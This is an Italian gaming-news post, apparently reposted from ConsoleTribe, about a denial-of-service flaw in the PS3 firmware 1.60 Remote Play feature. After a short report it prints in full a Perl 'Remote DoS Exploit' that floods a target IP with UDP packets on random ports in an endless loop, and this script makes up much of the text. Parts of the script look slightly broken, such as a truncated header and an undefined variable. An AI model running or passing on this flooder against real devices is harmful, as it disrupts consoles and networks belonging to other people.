Da ConsoleTribe:
Come sostenuto ironicamente da un programmatore del team Paradox, Sony, con lo sviluppo delle molteplici funzionalitą della dashboard PS3, ha involontariamente (o volontariamente?) prestato il fianco all'hacking della nuova console.
Nonostante i recenti aggiornamenti rilasciati, non mancano i tentativi di attacco al sistema di sicurezza andati a buon fine: Dark kkk ha scoperto una falla nell'ultimo sistema PS3, la versione 1.60, in particolare nella gestione della connessione remota tra PSP e PS3.
Attraverso poche righe di codice l'hacker č stato in grado di generare un
overflow in memoria, risultato che, a detta dell'autore, non garantisce in ogni caso la possibilitą di lanciare codice unsigned sulla macchina. Chissą che la scoperta non possa invece fruttare e portare allo sviluppo di qualche interessante tool o a qualche procedura di downgrading.
Di seguito il codice utilizzato per l'exploit Remote DoS:
#!/usr/bin/perl
####.
laystation 3 "Remote Play" Remote DoS Exploit:.####
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K
#
# POC code is based on odix's perl udp flooder
################################################## ########
use Socket;
$ARGC=@ARGV;
if ($ARGC !=1) {
printf "usage: ./ps3rpdos.pl \n";
exit(1);
}
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");
printf "Sending...\n";
for ( ; ; ) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}